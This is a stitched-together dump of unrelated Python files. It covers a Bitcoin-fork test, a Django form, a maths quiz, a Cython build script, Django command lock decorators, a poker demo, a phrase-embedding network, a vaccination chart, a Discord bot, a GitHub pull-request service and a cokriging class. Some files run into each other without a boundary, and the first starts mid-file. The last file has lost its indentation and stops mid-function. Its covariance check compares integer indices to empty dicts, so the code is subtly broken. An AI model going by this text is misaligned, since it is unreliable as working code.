        """Send 50 coins from node 2's 'L21' account to a fresh node-0
        address and confirm with 6 blocks."""
        self.addr_Q01 = self.nodes[0].getnewaddress("Q01")
        self.log.info("addr_Q01: %s", self.addr_Q01)
        result = self.nodes[2].getbalance()
        self.log.info("node[2] balance: %s", result)
        result = self.nodes[2].listaccounts()
        self.log.info("node[2] accounts: %s", result)
        self.nodes[2].sendfrom("L21", self.addr_Q01, 50.0)
        self.sync_all()
        self.nodes[3].generate(6)
        self.sync_all()
        pass

    def reject_bitcoin_test(self):
        """Post-fork, paying a legacy address must fail while paying a BPQ
        address succeeds."""
        addr_L31 = self.nodes[3].getnewaddress("L31", "legacy")
        #self.nodes[3].sendtoaddress(addr_L31, 1.0)
        assert_raises_rpc_error(-4, "Transaction must contain only BPQ outputs",
                                self.nodes[3].sendtoaddress, addr_L31, 1.0)
        addr_Q31 = self.nodes[3].getnewaddress("Q31")
        self.nodes[3].sendtoaddress(addr_Q31, 1.0)

    def run_test(self):
        # Mine the premine, give nodes 1-3 a block each, then run the checks.
        self.make_premine()
        self.nodes[1].generate(1)
        self.nodes[2].generate(1)
        self.nodes[3].generate(1)
        self.reject_bitcoin_test()
        self.sync_all()
        self.spend_premine_test()
        self.first_transaction_test()
        pass
# Standard functional-test entry point: BitcoinTestFramework.main() parses
# CLI options and drives run_test().
if __name__ == '__main__':
    BpqTest().main()
|
from django.contrib.auth.forms import AuthenticationForm


class LoginForm(AuthenticationForm):
    """Project alias for Django's stock AuthenticationForm; adds no behaviour."""
# Interactive 10-question arithmetic quiz. Improvements over the original:
# imports are hoisted to the top of the script (random/time were re-imported
# inside the loop and inside a branch), the countdown helper is defined once
# up front, the operator list is built once instead of every iteration, and
# the operator dispatch is a single consistent if/elif ladder (the original
# mixed a bare `if` into the chain).
import random
import time

name = input('Enter your name to costomize your personal Maths quiz decathlon:')
print(name, """'s Maths quiz decathlon
Answer as many questions as possible to attain the maximum points""")
print('''USERS MANUAL
OPERATORS:
+ ==- ADDITION
- ==- SUBSTRACTION
x ==- MULTIPLICATION
/ ==- DIVISION''')
respond = input('Are you ready to do some Maths?(Yes or No):')
correct_response = ['Yes', 'yes', 'Yes ', 'yes ', ' Yes', ' yes']
score_sheet = 0


def countdown(t):
    """Display a mm:ss countdown for t seconds."""
    while t:
        mins, secs = divmod(t, 60)
        timer = '{:02d}:{:02d}'.format(mins, secs)
        print(timer, end="\r")
        time.sleep(1)
        t -= 1


if respond in correct_response:
    print("Let's get our Maths pants on!")
    print('Test begins after countdown')
    t = 3
    countdown(int(t))
    emoji = chr(9786)
    list_of_operators = ['plus', 'minus', 'multiplied by', 'divided by']
    for i in range(10):
        num_1 = random.randint(-100, 100)
        num_2 = random.randint(1, 10)
        operator = random.choice(list_of_operators)
        print('Compute ({}) {} ({})' .format(num_1, operator, num_2))
        if operator == list_of_operators[0]:
            answer_1 = num_1 + num_2
            user_reply = int(input('Enter your answer here:'))
        elif operator == list_of_operators[1]:
            answer_1 = num_1 - num_2
            user_reply = int(input('Enter your answer here:'))
        elif operator == list_of_operators[2]:
            answer_1 = num_1 * num_2
            user_reply = int(input('Enter your answer here:'))
        elif operator == list_of_operators[3]:
            # Division answers are compared rounded to two decimal places.
            answer_2 = num_1 / num_2
            answer_1 = round(answer_2, 2)
            user_reply = float(input('Enter your answer here:'))
        if answer_1 == user_reply:
            score_sheet = score_sheet + 10
            print("Excellent job!.You're a genius")
            print('You have {} points!' .format(score_sheet))
        else:
            # One wrong answer ends the quiz immediately.
            print('That is incorrect!')
            print('The right answer is', answer_1)
            print("You've failed the math quiz decathlon.")
            print('Try again later!')
            print('Your final score is {} {}' .format(score_sheet, emoji))
            break
else:
    print("Let's try again some other time")
#!/usr/bin/env python3
from distutils.core import setup
from distutils.extension import Extension
from Cython import __version__
from Cython.Distutils import build_ext
#from Cython.Build import cythonize
import numpy as np
from LoLIM.utilities import GSL_include, GSL_library_dir
from Cython.Compiler.Options import get_directive_defaults
# Cython compiler directives; tracing/profiling entries can be enabled here
# together with the CYTHON_TRACE macro below when debugging performance.
directive_defaults = get_directive_defaults()

# Extra C macro definitions handed to the compiler (empty by default).
CT = []
# CT = [('CYTHON_TRACE', '1')]
# directive_defaults['linetrace'] = True
# directive_defaults['binding'] = True
# directive_defaults['profile'] = True

print('cython version', __version__ )

print()
print()

# Beamforming extension: needs NumPy headers plus GSL/BLAS from LoLIM's
# configured install location.
ext_CT = Extension(
    "cython_beamforming_tools_centerT",
    ["cython_beamforming_tools_centerT.pyx"],
    include_dirs=[np.get_include(), GSL_include()],
    library_dirs=[GSL_library_dir()],
    libraries=["gsl", 'blas'],
    define_macros=CT,
)

setup(ext_modules=[ext_CT],
      cmdclass={'build_ext': build_ext})
|
from Ex0109 import moeda

# Read a price and show it halved, doubled, increased by 10% and reduced by
# 13%, each formatted as currency by the moeda helper module (flag True asks
# the helpers to format their result).
p = float(input('Digite o preço: R$ '))
print(f'A metade de {moeda.moeda(p)} é {moeda.metade(p, True)}')
print(f'O dobro de {moeda.moeda(p)} é {moeda.dobro(p, True)}')
print(f'Aumentando em 10%, temos {moeda.aumentar(p, 10, True)}')
print(f'Reduzindo em 13%, temos {moeda.diminuir(p, 13, True)}')
|
from __future__ import print_function
# pylint: disable=pointless-string-statement, line-too-long
import logging
import tempfile
import time
import traceback
from lockfile import FileLock, AlreadyLocked, LockTimeout
import arrow
from django.conf import settings
from django.utils.text import slugify
"""
Decorators for wrapping existing Django management commands for use within the
Quicksilver task execution system.
"""
def add_qs_arguments(handle):
    """Wrap a management command's add_arguments so the Quicksilver
    scheduling options are registered before the command's own arguments.

    Adds --qs-context (whether Quicksilver invoked the command) and
    --qs-next-interval (seconds until the next scheduled run), then
    delegates to the wrapped add_arguments.
    """
    # functools.wraps preserves the wrapped function's name/docstring for
    # introspection; the original decorator dropped them.
    from functools import wraps

    @wraps(handle)
    def wrapper(self, parser):
        parser.add_argument('--qs-context', dest='_qs_context', default=True, required=False)
        parser.add_argument('--qs-next-interval', dest='_qs_next_interval', type=int, default=5, required=False)
        handle(self, parser)
    return wrapper
def handle_schedule(handle):
    """Wrap a command handler to strip the Quicksilver bookkeeping options
    and, when invoked by Quicksilver, print the next scheduled run time.

    Pops `_qs_context` and `_qs_next_interval` from the options before
    delegating, so the wrapped handler never sees them. The
    `_qs_next_run: <iso timestamp>` line on stdout is what Quicksilver
    reads to schedule the next execution.
    """
    # Preserve the wrapped handler's metadata (name/docstring).
    from functools import wraps

    @wraps(handle)
    def wrapper(self, *args, **options):
        # pop(..., default) replaces the original membership-test-plus-del
        # dance; defaults match the original behaviour when keys are absent.
        invoked_by_qs = options.pop('_qs_context', False)
        next_interval = options.pop('_qs_next_interval', None)
        handle(self, *args, **options)
        if invoked_by_qs and next_interval is not None:
            print('_qs_next_run: ' + arrow.get().shift(seconds=next_interval).isoformat())
    return wrapper
# Lock timeout value - how long to wait for the lock to become available.
# Default behavior is to never wait for the lock to be available (fail fast):
# -1 makes FileLock.acquire raise AlreadyLocked immediately. Override via
# DEFAULT_LOCK_WAIT_TIMEOUT in Django settings.
LOCK_WAIT_TIMEOUT = getattr(settings, "DEFAULT_LOCK_WAIT_TIMEOUT", -1)
def handle_lock(handle):
    """
    Decorate the handle method with a file lock to ensure there is only ever
    one process running at any one time.

    The lock file name is derived from the site (SITE_URL or ALLOWED_HOSTS),
    the command module name, and the task queue (if any), so different
    commands/queues do not block each other.
    """
    def wrapper(self, *args, **options):
        # Build a site-specific prefix; fall back through ALLOWED_HOSTS to a
        # fixed default if neither setting is usable.
        lock_prefix = ''
        try:
            lock_prefix = settings.SITE_URL.split('//')[1].replace('/', '').replace('.', '-')
        except AttributeError:
            try:
                lock_prefix = settings.ALLOWED_HOSTS[0].replace('.', '-')
            except IndexError:
                lock_prefix = 'qs_lock'
        lock_suffix = ''
        if 'task_queue' in options:
            lock_suffix = '_' + options.get('task_queue')
        lock_prefix = slugify(lock_prefix)
        lock_suffix = slugify(lock_suffix)
        start_time = time.time()
        # Map --verbosity to a logging level (0=ERROR ... 3+=DEBUG).
        verbosity = options.get('verbosity', 0)
        if verbosity == 0:
            level = logging.ERROR
        elif verbosity == 1:
            level = logging.WARN
        elif verbosity == 2:
            level = logging.INFO
        else:
            level = logging.DEBUG
        logging.basicConfig(level=level, format="%(message)s")
        logging.debug("-" * 72)
        lock_name = self.__module__.split('.').pop()
        lock_filename = '%s/%s__%s__%s' % (tempfile.gettempdir(), lock_prefix, lock_name, lock_suffix) # pylint: disable=consider-using-f-string
        # Trim trailing underscores left by an empty suffix.
        while lock_filename.endswith('_'):
            lock_filename = lock_filename[:-1]
        lock = FileLock(lock_filename)
        logging.debug("%s - acquiring lock...", lock_name)
        try:
            lock.acquire(LOCK_WAIT_TIMEOUT)
        except AlreadyLocked:
            logging.debug("lock already in place. quitting.")
            return
        except LockTimeout:
            logging.debug("waiting for the lock timed out. quitting.")
            return
        logging.debug("acquired.")
        try:
            handle(self, *args, **options)
        except: # pylint: disable=bare-except
            # Deliberate catch-all: a failing command must not take down the
            # scheduler loop; log the traceback and fall through.
            logging.error("Command Failed")
            logging.error('==' * 72)
            logging.error(traceback.format_exc())
            logging.error('==' * 72)
        finally:
            # BUG FIX: release moved into `finally` so the lock is freed even
            # if one of the logging calls in the except path itself raises;
            # previously that would leave a stale lock file behind.
            logging.debug("releasing lock...")
            lock.release()
            logging.debug("released.")
        logging.info("done in %.2f seconds", (time.time() - start_time))
        return
    return wrapper
|
from pypokerengine.api.game import setup_config, start_poker
from RanomPlayer import RandomPlayer

# Ten-round game, 100-chip starting stacks, small blind of 5.
game_config = setup_config(max_round=10, initial_stack=100, small_blind_amount=5)

# Register the two random-acting AI players.
game_config.register_player(name="p1", algorithm=RandomPlayer())
game_config.register_player(name="p2", algorithm=RandomPlayer())

# Run the game; verbose=1 prints round-by-round progress.
game_result = start_poker(game_config, verbose=1)
|
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2019-06-16 14:32
# @Author : Yongfei Liu
# @Email : liuyf3@shanghaitech.edu.cn
import torch
import torch.nn as nn
from maskrcnn_benchmark.config import cfg
import json
import numpy as np
class PhraseEmbeddingSent(torch.nn.Module):
    """Embed the annotated phrases (and optionally the relation phrases) of
    each caption by running word embeddings through a bidirectional GRU and
    pooling the hidden states over every phrase span.
    """

    def __init__(self, cfg, phrase_embed_dim=1024, bidirectional=True):
        # NOTE(review): the `bidirectional` argument is never read — both
        # GRUs hard-code bidirectional=True; confirm it can be removed.
        super(PhraseEmbeddingSent, self).__init__()
        # Pooling mode used for phrase vectors: 'Mean' or 'Sum'.
        self.phrase_select_type = 'Mean'
        vocab_file = open(cfg.MODEL.VG.VOCAB_FILE)
        self.vocab = json.load(vocab_file)
        vocab_file.close()
        # Index 0 is reserved for padding, hence the +1 shift.
        self.vocab_to_id = {v:i+1 for i,v in enumerate(self.vocab)}
        self.embed_dim = phrase_embed_dim
        # Bidirectional GRU: half-size hidden state per direction keeps the
        # concatenated output at embed_dim.
        self.hidden_dim = self.embed_dim//2
        self.embedding = nn.Embedding(num_embeddings=len(self.vocab_to_id) + 1,
                                      embedding_dim=self.embed_dim,
                                      padding_idx=0, # -> first_dim = zeros
                                      sparse=False)
        self.sent_rnn = nn.GRU(input_size=self.embed_dim,
                               hidden_size=self.hidden_dim,
                               num_layers=1,
                               batch_first=True,
                               dropout=0,
                               bidirectional=True)
        # Separate GRU for relation phrases, only built when the relation
        # branch is enabled in the config.
        if cfg.MODEL.RELATION.INTRA_LAN:
            self.rel_rnn = nn.GRU(input_size=self.embed_dim,
                                  hidden_size=self.hidden_dim,
                                  num_layers=1,
                                  batch_first=True,
                                  dropout=0,
                                  bidirectional=True)

    def forward(self, all_sentences, all_phrase_ids, all_sent_sgs, device_id):
        """Return per-caption phrase ids/types, word embeddings, pooled
        phrase embeddings, relation-phrase embeddings, relation connectivity
        and phrase-to-word alignment masks.

        NOTE(review): this method reads the module-level `cfg` import for the
        RELATION flags while __init__ used the `cfg` argument — confirm both
        always refer to the same configuration object.
        """
        batch_phrase_ids = []
        batch_phrase_types = []
        batch_phrase_embed = []
        batch_rel_phrase_embed = []
        batch_relation_conn = []
        batch_word_embed = []
        batch_word_to_graph_conn = []
        for idx, sent in enumerate(all_sentences): # all_sentence: [b, dict] for one caption ; all_phrase_ids: [b, max_phrase_num] which is the phrase have the bbox annotation; all_sent_sgs: [b, relation_num, 3]
            seq = sent['sentence'].lower()
            phrases = sent['phrases']
            phrase_ids = []
            phrase_types = []
            input_phr = []
            lengths = []
            phrase_embeds_list = []
            valid_phrases = filter_phrase(phrases, all_phrase_ids[idx]) # valid_phrases are the phrase which have the bbox annotation
            tokenized_seq = seq.split(' ')
            input_seq_idx = []
            for w in tokenized_seq:
                input_seq_idx.append(self.vocab_to_id[w]) # self.vocab_to_ids is a dict record all word in caption
            input_seq_idx = torch.LongTensor(input_seq_idx).to(device_id) # input_seq_idx: [word_num]
            seq_embeds = self.embedding(input_seq_idx) # seq_embeds: [word_num, embedding_dim]
            seq_embeds, _ = self.sent_rnn(seq_embeds.unsqueeze(0)) # seq_embeds: [1, word_num, 2*hidden_dim]
            word_to_graph_conn = np.zeros((len(valid_phrases), seq_embeds.shape[1]))
            for pid, phr in enumerate(valid_phrases): # word_to_graph_conn: [valid_phrase_num, word_num] means the position of each phrase in the caption
                phrase_ids.append(phr['phrase_id'])
                phrase_types.append(phr['phrase_type'])
                tokenized_phr = phr['phrase'].lower().split(' ')
                phr_len = len(tokenized_phr)
                start_ind = phr['first_word_index']
                # Pool the GRU states over the phrase's word span.
                if self.phrase_select_type == 'Mean':
                    phrase_embeds_list.append(torch.mean(seq_embeds[:, start_ind:start_ind+phr_len, :], 1))
                elif self.phrase_select_type == 'Sum':
                    phrase_embeds_list.append(torch.sum(seq_embeds[:, start_ind:start_ind+phr_len, :], 1))
                else:
                    raise NotImplementedError
                lengths.append(phr_len)
                input_phr.append(tokenized_phr) # input_phr: [valid_phrase_num,] in which is the list store the tokenized phrase
                word_to_graph_conn[pid, start_ind:start_ind+phr_len] = 1
            phrase_embeds = torch.cat(tuple(phrase_embeds_list), 0) # phrase_embeds: [valid_phrase_num, 2*hidden_dim]
            batch_word_embed.append(seq_embeds[0]) # batch_word_embed: [b, word_num, 2*hidden_dim]
            batch_phrase_ids.append(phrase_ids) # batch_phrase_ids: [b, valid_phrase_num] string
            batch_phrase_types.append(phrase_types) # batch_phrase_types: [b, valied_phrase_num] string
            batch_phrase_embed.append(phrase_embeds) # batch_phrase_embed: [b, valied_phrase_num, 2*hidden_dim]
            batch_word_to_graph_conn.append(word_to_graph_conn) # batch_word_to_graph_conn: [b, valid_phrase_num, word_num]
            if cfg.MODEL.RELATION.INTRA_LAN:
                """
                rel phrase embedding
                """
                # get sg
                sent_sg = all_sent_sgs[idx]
                relation_conn = [] # relation_conn: [valid_relation_num, 3]
                rel_lengths = []
                input_rel_phr = []
                input_rel_phr_idx = []
                for rel_id, rel in enumerate(sent_sg):
                    sbj_id, obj_id, rel_phrase = rel
                    # Skip relations whose endpoints have no bbox annotation.
                    if sbj_id not in phrase_ids or obj_id not in phrase_ids:
                        continue
                    relation_conn.append([phrase_ids.index(sbj_id), phrase_ids.index(obj_id), rel_id])
                    # Fixed-size padded buffer; +5 leaves headroom for the
                    # subject/object tokens that may be prepended/appended below.
                    uni_rel_phr_idx = torch.zeros(len(tokenized_seq)+5).long()
                    tokenized_phr_rel = rel_phrase.lower().split(' ')
                    if cfg.MODEL.RELATION.INCOR_ENTITIES_IN_RELATION:
                        tokenized_phr_rel = input_phr[phrase_ids.index(sbj_id)] + tokenized_phr_rel + input_phr[
                            phrase_ids.index(obj_id)]
                    rel_phr_idx = [] # tokenized_phr_rel: list, the tokens of relation phrase(maybe can incoperate the subject and object phrase)
                    for w in tokenized_phr_rel:
                        rel_phr_idx.append(self.vocab_to_id[w])
                    rel_phr_len = len(tokenized_phr_rel)
                    rel_lengths.append(rel_phr_len)
                    input_rel_phr.append(tokenized_phr_rel)
                    uni_rel_phr_idx[:rel_phr_len] = torch.Tensor(rel_phr_idx).long()
                    input_rel_phr_idx.append(uni_rel_phr_idx) # input_rel_phr_idx: list, the relation phrase index in caption vocab
                if len(relation_conn) > 0:
                    input_rel_phr_idx = torch.stack(input_rel_phr_idx) # input_rel_phr_idx: [valid_relation_num, max_relation_len]
                    rel_phrase_embeds = self.embedding(input_rel_phr_idx.to(device_id))
                    rel_phrase_embeds, _ = self.rel_rnn(rel_phrase_embeds)
                    rel_phrase_embeds = select_embed(rel_phrase_embeds, lengths=rel_lengths, select_type=self.phrase_select_type) # rel_phrase_embeds: [valid_relation_num, 1]
                    batch_rel_phrase_embed.append(rel_phrase_embeds)
                else:
                    batch_rel_phrase_embed.append(None) # batch_rel_phrase_embed: [b, valid_relation_num, 1]
                batch_relation_conn.append(relation_conn) # batch_relation_conn: [b, valid_relation_num,3]
        return batch_phrase_ids, batch_phrase_types, batch_word_embed, batch_phrase_embed, batch_rel_phrase_embed, batch_relation_conn, batch_word_to_graph_conn
def filter_phrase(phrases, all_phrase):
    """Return only the phrase dicts whose 'phrase_id' appears in all_phrase.

    :param phrases: iterable of phrase dicts, each carrying a 'phrase_id' key
    :param all_phrase: container of phrase ids that have a bbox annotation
    :return: list of the phrase dicts kept, in their original order
    """
    # Comprehension replaces the original manual append loop.
    return [phr for phr in phrases if phr['phrase_id'] in all_phrase]
def select_embed(x, lengths, select_type=None):
    """Pool variable-length sequence embeddings along the time dimension.

    :param x: tensor [batch, max_len, dim] of per-step embeddings
    :param lengths: list of valid lengths, one per batch row
    :param select_type: 'Mean' averages the first lengths[i] steps,
        'Sum' adds them; anything else raises NotImplementedError
    :return: tensor [batch, dim] of pooled embeddings
    """
    batch_size = x.size(0)
    # torch.zeros_like replaces the deprecated
    # `x.data.new().resize_as_(x.data).fill_(0)` idiom: same shape, dtype
    # and device, without touching .data.
    mask = torch.zeros_like(x)
    for i in range(batch_size):
        if select_type == 'Mean':
            # Uniform weights over the valid prefix -> masked mean.
            mask[i][:lengths[i]].fill_(1/lengths[i])
        elif select_type == 'Sum':
            mask[i][:lengths[i]].fill_(1)
        else:
            raise NotImplementedError
    x = x.mul(mask)
    x = x.sum(1).view(batch_size, -1)
    return x
def specific_word_replacement(word_list):
    """
    Swap the direction words 'left' and 'right' inside matching tokens.

    :param word_list: ["xxx", "xxx", "xxx"]
    :return: new word_list: ["xxx", 'xxx', 'xxx']
    """
    # NOTE(review): left_word_dict / right_word_dict are not defined in this
    # module as shown — confirm they are injected/imported elsewhere before
    # this function is called.
    new_word_list = []
    for word in word_list:
        if word in left_word_dict:
            # Token is a known "left" word: flip it to "right".
            word = word.replace('left', 'right')
        elif word in right_word_dict:
            word = word.replace('right', 'left')
        new_word_list.append(word)
    return new_word_list
|
# %% Imports
import pandas
import bar_chart_race as bcr
from matplotlib import colors
# %% Load data from PHE API and transform it to the right format
# The CSV has one row per (date, nation, metric); melt + pivot reshapes it
# into one column per "<nation> <dose>" series so each bar gets its own column.
df = pandas.read_csv('https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumVaccinationFirstDoseUptakeByPublishDatePercentage&metric=cumVaccinationSecondDoseUptakeByPublishDatePercentage&format=csv')
df.drop(columns=['areaType','areaCode'], inplace=True)
df.rename(columns={'cumVaccinationFirstDoseUptakeByPublishDatePercentage':' 1st dose','cumVaccinationSecondDoseUptakeByPublishDatePercentage':' 2nd dose'},inplace=True)
df = df.melt(id_vars=['date','areaName'], var_name='dose')
# Combined label, e.g. "England 1st dose", used as the column key below.
df['metric'] = df['areaName'] + df['dose']
df.drop(columns=['areaName','dose'],inplace=True)
df = df.pivot(index='date', columns='metric', values='value')
# Duplicate last row so it displays
df = pandas.concat([df,pandas.DataFrame(df[-1:].values, index=[df.index.max()], columns=df.columns)])
# %% Build the bar chart race, with suitable country colours
# %%
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
# Two consecutive identical colours per nation — one pair for each nation's
# "1st dose" / "2nd dose" columns (columns are consumed in sorted order).
cmap = colors.ListedColormap(['white', 'white', '#076543', '#076543', '#005eb8', '#005eb8', '#D30731', '#D30731'])
bcr.bar_chart_race(
    df,
    title=r'COVID-19 vaccination progress (% of adults) in the UK',
    filename=None,  # presumably renders in-notebook instead of writing a file — confirm
    steps_per_period=10,
    figsize=(16,9),
    dpi=240,
    title_size=28,
    bar_label_size=24,
    tick_label_size=24,
    period_label={'x': .99, 'y': .25, 'ha': 'right', 'va': 'center', 'size': 22},
    cmap=cmap)
|
# bot.py from https://realpython.com/how-to-make-a-discord-bot-python/
import os
import random
import discord
from dotenv import load_dotenv

# Credentials and target guild name come from the .env file.
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
GUILD = os.getenv('DISCORD_GUILD')
client = discord.Client()

@client.event
async def on_ready():
    # Locate the configured guild among those the bot is connected to.
    # NOTE(review): if no guild matches GUILD, `guild` stays bound to the
    # last one iterated and is printed anyway — confirm that is acceptable.
    for guild in client.guilds:
        if guild.name == GUILD:
            break
    print(
        f'{client.user} is connected to the following guild:\n'
        f'{guild.name}(id: {guild.id})'
    )

# Canned reactions sent whenever a message mentions "defacto"/"de facto".
responses = ["🤬!?tRiGGerEd?!🤬", "pO👏dE👏fI👏nI👏cI👏jI", "💥😩💥😩💥😩", "🏃🎓🔥"]

@client.event
async def on_message(message):
    lower = message.content.lower()
    if "defacto" in lower or "de facto" in lower:
        await message.channel.send(random.choice(responses))

client.run(TOKEN)
|
from typing import Dict, List
from github.PullRequest import PullRequest
from github.Repository import Repository
from ..config import LennyBotConfig
import requests
from github import Github
class GitHubService:
    """GitHub access layer: fetches release/tag metadata over the REST API
    and manages the bot's dependency-update pull requests via PyGithub.

    The raw REST helpers work without a token (with lower rate limits);
    PR management requires `github_token` in the config, otherwise
    create_pr raises.
    """

    def __init__(self, config: LennyBotConfig):
        self._config = config
        self._token = self._config.github_token
        # The PyGithub client is only constructed when a token is configured.
        self._github = None
        if self._token is not None:
            self._github = Github(self._token)

    def fetch_latest_release(self, repository: str) -> Dict:
        """Return the JSON payload of the latest release of `repository`
        ("owner/name"). Raises on any non-200 response."""
        url = f"https://api.github.com/repos/{repository}/releases/latest"
        response = requests.get(url, headers=self._headers())
        if response.status_code != 200:
            raise Exception(f"Unable to fetch latest version, Status: {response.status_code}, Content: {response.text}")
        return response.json()

    def fetch_tags(self, repository: str) -> List:
        """Return the list of git tag refs of `repository` ("owner/name").
        Raises on any non-200 response."""
        url = f"https://api.github.com/repos/{repository}/git/refs/tags"
        response = requests.get(url, headers=self._headers())
        if response.status_code != 200:
            # BUG FIX: this message previously said "Unable to fetch latest
            # version" — copy-pasted from fetch_latest_release; it now names
            # the tags endpoint so failures are attributable.
            raise Exception(f"Unable to fetch tags, Status: {response.status_code}, Content: {response.text}")
        return response.json()

    def create_pr(self, branch_name, title, body):
        """Open a PR from `branch_name` into the default branch, label it
        'dependencies', and close older bot PRs it supersedes."""
        if self._github is None:
            raise Exception("GitHub is not configured")
        repo = self._github.get_repo(self._config.github_pr.repository)
        new_pull = repo.create_pull(title, body, repo.default_branch, branch_name)
        labels = self._get_or_create_labels(repo)
        new_pull.add_to_labels(*labels)
        # Comment on and close any older open bot PRs (same branch prefix).
        pulls = self._find_own_pulls()
        for pull in pulls:
            if new_pull.id == pull.id:
                continue
            pull.as_issue().create_comment(f"Superseded by #{new_pull.number}")
            pull.edit(state="closed")

    def _find_own_pulls(self) -> List[PullRequest]:
        """Return the open PRs whose head branch carries the bot's prefix."""
        repo = self._github.get_repo(self._config.github_pr.repository)
        pulls = repo.get_pulls("open")
        result = []
        for pull in pulls:
            if pull.head.ref.startswith(self._config.github_pr.branch_prefix):
                result.append(pull)
        return result

    def _headers(self) -> Dict:
        """Authorization headers for raw REST calls (empty when no token)."""
        headers = {}
        if self._token is not None:
            headers["Authorization"] = f"Bearer {self._token}"
        return headers

    def _get_or_create_labels(self, repo: Repository):
        """Return the repo's 'dependencies' label, creating it if missing."""
        for label in repo.get_labels():
            if label.name == "dependencies":
                return [label]
        label = repo.create_label("dependencies", "0366d6", "Pull requests that update a dependency file")
        return [label]
# Module-level configuration for the samplify API client.
# NOTE(review): hard-coded IP endpoint — confirm this should not come from
# configuration/environment.
api_base = 'http://34.207.8.15:8080/api'
api_version = 'v1'
# Auth token; expected to be assigned by the caller before making requests.
token = None
from samplify.resources import Publications
|
from .holding import HoldingAdminMessage # noqa: F401
from .lending import LendingAdminMessage # noqa: F401
|
from typing import Any, Type, TypeVar, cast
from ._from_native import from_native
from ._props import Props
from ._schema_facade import SchemaFacade
from ._schema_visitor import SchemaVisitor, SchemaVisitorReturnType
from ._version import version
from .representor import Representor
from .types import AnySchema, GenericSchema, Schema, optional
__version__ = version
__all__ = ("schema", "GenericSchema", "Props", "SchemaVisitor", "SchemaVisitorReturnType",
           "from_native", "optional", "register_type", "represent",)

# Singleton facade through which all schema types are accessed (schema.<name>).
schema = SchemaFacade()
# Shared representor instance used by the __repr__ installed below.
_representor = Representor()
_SchemaType = TypeVar("_SchemaType", bound=GenericSchema)


def register_type(name: str, schema_type: Type[_SchemaType]) -> _SchemaType:
    """Expose a custom schema type as `schema.<name>` and return the
    instance the facade now produces for it."""
    assert issubclass(schema_type, Schema)
    # Each attribute access constructs a fresh schema_type instance.
    setattr(SchemaFacade, name, property(lambda self: schema_type()))
    return cast(_SchemaType, getattr(schema, name))


def represent(self: GenericSchema, **kwargs: Any) -> str:
    """Render a schema via the shared representor (installed as __repr__)."""
    return self.__accept__(_representor, **kwargs)


def union(self: GenericSchema, other: Any) -> AnySchema:
    """Combine two schemas into an `any` union (installed as __or__)."""
    return schema.any(self, other)


# Install the helpers onto the base Schema class so every schema instance
# gets repr() output and the `|` union operator.
Schema.__override__("__repr__", represent)
Schema.__override__("__or__", union)
|
# -*- coding: utf-8 -*-
"""
A cokriging program for points or blocks on a regular grid.
Created on Fri Dec 2 2016
"""
from __future__ import division, print_function, absolute_import
import json
from itertools import product
import time
from collections import namedtuple
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
from super_block import SuperBlockSearcher
__author__ = "yuhao"
class Cokrige(object):
def __init__(self, param_file):
self.param_file = param_file
self._read_params()
self._check_params()
self.property_name = None
self.vr = None
self.rotmat = None
self.estimation = None
self.estimation_variance = None
self.xdb = None
self.ydb = None
self.zdb = None
self._2d = False
self.searcher = None
self.const = None
self._block_covariance = None
self._unbias = None
self.maxcov = None
self._mdt = None
self.resc = None
self.nst = list()
self.c0 = list()
self.it = list()
self.cc = list()
self.ang1 = list()
self.ang2 = list()
self.ang3 = list()
self.aa_hmax = list()
self.aa_hmin = list()
self.aa_vert = list()
def _read_params(self):
with open(self.param_file) as fin:
params = json.load(fin)
# data file definition
self.datafl = params['datafl'] #: 'testData/test.gslib',
self.nvr = params['nvar'] # number (primary + secondary)
self.ixl = params['icolx'] #: 1,
self.iyl = params['icoly'] #: 2,
self.izl = params['icolz']
self.ivrl = params['icolvr'] # list
# data limits
self.tmin = params['tmin'] #: -1.0e21,
self.tmax = params['tmax'] #: 1.0e21,
# collocated cokriging or not
self.icolloc = params['icolloc'] # boolean
# definition of collocated data file
self.secfl = params['secfl']
self.iclcol = params['iclcol']
self.idbg = params['idbg'] #: 3,
self.dbgfl = params['dbgfl'] #: 'kb2d.dbg',
self.outfl = params['outfl'] #: 'out.dat',
# Grid definition
self.nx = params['nx'] #: 50,
self.xmn = params['xmn'] #: 0.5,
self.xsiz = params['xsiz'] #: 1.0,
self.ny = params['ny'] #: 50,
self.ymn = params['ymn'] #: 0.5,
self.ysiz = params['ysiz'] #: 1.0,
self.nz = params['nz'] #: 50,
self.zmn = params['zmn'] #: 0.5,
self.zsiz = params['zsiz'] #: 1.0,
# discretization definition
self.nxdis = params['nxdis'] #: 1,
self.nydis = params['nydis'] #: 1,
self.nzdis = params['nzdis'] #: 1,
# maximum and minimum data points used in kriging
self.ndmin = params['ndmin'] # for both
self.ndmaxp = params['ndmaxp'] # primary
self.ndmaxs = params['ndmaxs'] # secondary
# search radii for primary variable
self.pradius_hmax = params['radius_hmax'] # scalar
self.pradius_hmin = params['radius_hmin'] # scalar
self.pradius_vert = params['radius_vert'] # scalar
# search radii for secondary variables
self.sradius_hmax = params['radius_hmax'] # scalar
self.sradius_hmin = params['radius_hmin'] # scalar
self.sradius_vert = params['radius_vert'] # scalar
# search ellipsoid
self.sang1 = params['sang1'] # scalar
self.sang2 = params['sang2'] # scalar
self.sang3 = params['sang3'] # scalar
# kriging type
self.ktype = params['ikrige']
# mean values for primary and secondary variables
self.vmean = params['mean'] # list
# Vairography definition
self.vario = params['vario'] # list of dictionaries
def _fill_check_covariance(self):
self.variography = [dict()] * self.nvr * self.nvr
for var in self.vario:
self.variography[(var['i']-1) * self.nvr + (var['j']-1)] = var
# try fill in symmetric covariance element
for i, j in product(range(self.nvr), range(self.nvr)):
idx1 = i + j * self.nvr
idx2 = j + i * self.nvr
if idx1 == {} and idx2 == {}:
raise ValueError("need variogram between {},{}".format(i, j))
elif idx1 == {}:
self.variography[idx1] = self.variography[idx2]
elif idx2 == {}:
self.variography[idx2] = self.variography[idx1]
for var in self.variography:
self.nst.append(var['nst'])
self.c0.append(var['c0'])
self.it.append(var['it'])
for idx in range(var['nst']):
self.cc.append(var['cc'][idx])
self.ang1.append(var['ang1'][idx])
self.ang2.append(var['ang2'][idx])
self.ang3.append(var['ang3'][idx])
self.aa_hmax.append(var['aa_hmax'][idx])
self.aa_hmin.append(var['aa_hmin'][idx])
self.aa_vert.append(var['aa_vert'][idx])
# check linear model of coregionalization
# check definite positiveness
def _check_params(self):
# Check search radius
if self.pradius_hmax <= 0:
